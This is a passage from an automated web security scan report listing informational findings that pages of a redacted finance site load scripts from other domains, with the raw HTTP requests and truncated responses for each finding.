P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:56 GMT
Content-Length: 43288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.189. http://money.redacted/money-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /money-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /money-video HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:33 GMT
Content-Length: 41032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.190. http://money.redacted/mutual-fund

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mutual-fund HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:10 GMT
Content-Length: 62921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.191. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.192. http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:41 GMT
Content-Length: 71646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.193. http://money.redacted/personal-finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /personal-finance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personal-finance HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:31 GMT
Content-Length: 49078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.194. http://money.redacted/retirement

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /retirement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /retirement HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:21 GMT
Content-Length: 53585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.195. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:06 GMT
Content-Length: 33106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.196. http://money.redacted/stock-broker

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /stock-broker

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /stock-broker HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:15 GMT
Content-Length: 45081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.197. http://money.redacted/stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:18 GMT
Content-Length: 95347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.198. http://money.redacted/stocks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /stocks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /stocks HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:03 GMT
Content-Length: 59875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.199. http://money.redacted/taxes

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /taxes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /taxes HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:33 GMT
Content-Length: 46652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.200. http://money.redacted/top-stocks/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /top-stocks/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /top-stocks/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:25 GMT
Content-Length: 46268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.201. http://redacted/inc/Attributions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:48:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sat, 29 Jan 2011 23:48:25 GMT
Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.202. http://redacted/investor/StockRating/srsmain.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srsmain.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/StockRating/srsmain.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 29010
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:31 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.203. http://redacted/investor/StockRating/srstopstocksresults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.204. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
